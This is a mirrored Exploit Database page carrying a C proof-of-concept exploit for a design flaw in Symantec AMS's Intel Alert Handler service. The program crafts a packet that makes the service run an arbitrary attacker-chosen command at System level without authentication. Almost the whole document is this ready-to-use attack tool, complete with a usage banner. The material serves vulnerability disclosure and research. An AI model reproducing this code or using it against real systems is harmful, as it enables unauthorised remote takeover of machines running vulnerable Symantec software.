Symantec Ams Intel Alert Handler Service – Design Flaw

• Exploit Database
• 100 阅读

• 作者： Spider
  日期： 2010-07-28
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/14492/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153

  // Remote command execution at System level without authentication // Advisory:https://www.foofus.net/?page_id=149 // Exploit Title: Symantec AMS Intel Alert Handler service Design Flaw // Date: 07/28/10 // Author: Spider // Software Link: http://www.foofus.net/~spider/code/ams-cmd.cpp.txt // Tested on: Symantec SAVCE 10.1.8 and earlier with AMS installed   // POC code to execute commands on system vulnerable to AMS2 // design flaw of Intel Alert Handler service (hndlrsvc.exe) // within Symantec SAVCE 10.1.8 and earlier // ***Created by Spider July 2009*** //--------------------Foofus.net-------------------------   #include <stdio.h> #include <dos.h> #include <string.h> #include <winsock.h> #include <windows.h>   unsigned char payload[1000]; unsigned char inject1[] = "\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00" "\x02\x00\x95\x94\xc0\xa8\x02\x64\x00\x00\x00\x00\x00\x00\x00\x00" "\xe8\x03\x00\x00\x50\x52\x47\x58\x43\x4e\x46\x47\x10\x00\x00\x00" "\x00\x00\x00\x00\x04\x41\x4c\x48\x44\x5c\x46\x00\x00\x01\x00\x00" "\x00\x01\x00\x0e\x00\x52\x69\x73\x6b\x20\x52\x65\x70\x61\x69\x72" "\x65\x64\x00\x25\x00\x53\x79\x6d\x61\x6e\x74\x65\x63\x20\x41\x6e" "\x74\x69\x56\x69\x72\x75\x73\x20\x43\x6f\x72\x70\x6f\x72\x61\x74" "\x65\x20\x45\x64\x69\x74\x69\x6f\x6e\x00\xf9\x1d\x13\x4a\x3f\x0c" "\x00\x4c\x41\x42\x53\x59\x53\x54\x45\x4d\x2d\x31\x00\x08\x08\x0a" "\x00\x52\x69\x73\x6b\x20\x4e\x61\x6d\x65\x00\x07\x00\x05\x00\x54" "\x65\x73\x74\x00\x08\x0a\x00\x46\x69\x6c\x65\x20\x50\x61\x74\x68" "\x00\x07\x00\x05\x00\x54\x65\x73\x74\x00\x08\x11\x00\x52\x65\x71" "\x75\x65\x73\x74\x65\x64\x20\x41\x63\x74\x69\x6f\x6e\x00\x07\x00" "\x05\x00\x54\x65\x73\x74\x00\x08\x0e\x00\x41\x63\x74\x75\x61\x6c" "\x20\x41\x63\x74\x69\x6f\x6e\x00\x07\x00\x05\x00\x54\x65\x73\x74" "\x00\x08\x07\x00\x4c\x6f\x67\x67\x65\x72\x00\x07\x00\x05\x00\x54" "\x65\x73\x74\x00\x08\x05\x00\x55\x73\x65\x72\x00\x07\x00\x05\x00" "\x54\x65\x73\x74\x00\x08\x09\x00\x48\x6f\x73\x74\x6e\x61\x6d\x65" "\x00\x0e\x00\x0c\x00\x4c\x41\x42\x53\x59\x53\x54\x45\x4d\x2d\x31" "\x00\x08\x13\x00\x43\x6f\x72\x72\x65\x63\x74\x69\x76\x65\x20\x41" "\x63\x74\x69\x6f\x6e\x73\x00\x07\x00\x05\x00\x54\x65\x73\x74\x00" "\x00\x07\x08\x12\x00\x43\x6f\x6e\x66\x69\x67\x75\x72\x61\x74\x69" "\x6f\x6e\x4e\x61\x6d\x65\x00\x22\x00\x20";   unsigned char cmdother[] = "\x00\x08\x0c\x00\x43\x6f\x6d\x6d\x61\x6e\x64\x4c\x69\x6e\x65";   unsigned char inject2[] = "\x00\x08\x08\x00\x52\x75\x6e\x41\x72\x67\x73\x00\x04\x00\x02\x00" "\x20\x00\x03\x05\x00\x4d\x6f\x64\x65\x00\x04\x00\x02\x00\x00\x00" "\x0a\x0d\x00\x46\x6f\x72\x6d\x61\x74\x53\x74\x72\x69\x6e\x67\x00" "\x02\x00\x00\x00\x08\x12\x00\x43\x6f\x6e\x66\x69\x67\x75\x72\x61" "\x74\x69\x6f\x6e\x4e\x61\x6d\x65\x00\x02\x00\x00\x00\x08\x0c\x00" "\x48\x61\x6e\x64\x6c\x65\x72\x48\x6f\x73\x74\x00\x0b\x00\x09\x00" "\x44\x45\x41\x44\x42\x45\x45\x46\x00\x00\x00\x00\x00";   void banner (char *proga) { system("cls"); printf("\nUse: %s <ip><command>\n", proga); }   int main ( int argc, char *argv[] ) { SOCKET sock; WSADATA wsa; struct sockaddr_in addr;   printf("_______ ____\n"); printf(" | /\\ |/_/___ |__| _\\ |____ __ | /\\ | \n"); printf("\\_\\\\//_/ \\_\\ . \\||/ . / ._\\| `_/\\_\\\\//_/\n"); printf(" .&apos;/()\\&apos;./___/_/|__|\\___\\___\\|_| .&apos;/()\\&apos;. \n"); printf(" \\ \\/ /|_\\ \\ \\/ / \n"); printf("AMS Remote Command Tool\n");   int port; if ( argc < 3 ) { banner(argv[0]); exit(0); }   char *ip_addr = argv[1]; int length = (int)strlen(argv[2]);   if (length > 128) { printf("\n WARNING WARNING WARNING %s \n"); printf("\n Input Command String Greater than 128 Characters is not Permited %s \n"); exit (0); }   // building injection packet   inject1[353] = length+3; inject1[355] = length+1; memcpy(payload,inject1,356);   int a = 356; for (int i = 0; i<(length); i++) { a=a+1;payload[a] = argv[2][i]; }   int b = a; for (int i = 0; i<=14; i++) { b=b+1;payload[b] = cmdother[i]; }   int c = b; payload[c+2] = length+3; payload[c+4] = length+1;   int d = c+5; for (int i = 0; i<length; i++) { d=d+1;payload[d] = argv[2][i]; }   int e = d; for (int i = 0; i<=109; i++) { e=e+1;payload[e] = inject2[i]; }   // setting up socket and sending packet   printf("[] preparing....\n");   WSAStartup(MAKEWORD(2,0), &wsa); sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP); addr.sin_family = AF_INET; addr.sin_port = htons(38292); addr.sin_addr.s_addr = inet_addr(ip_addr);   printf("[] connecting..\n"); if ( connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1 ) { printf("[-] connection failed!\n"); exit(0); }   printf("[] sending crafted packet 1 ...\n"); if ( send(sock, payload, sizeof(payload), 0) == -1 ) { printf("[-] send failed!\n"); exit(0); }   closesocket(sock); WSACleanup();   return 0;   }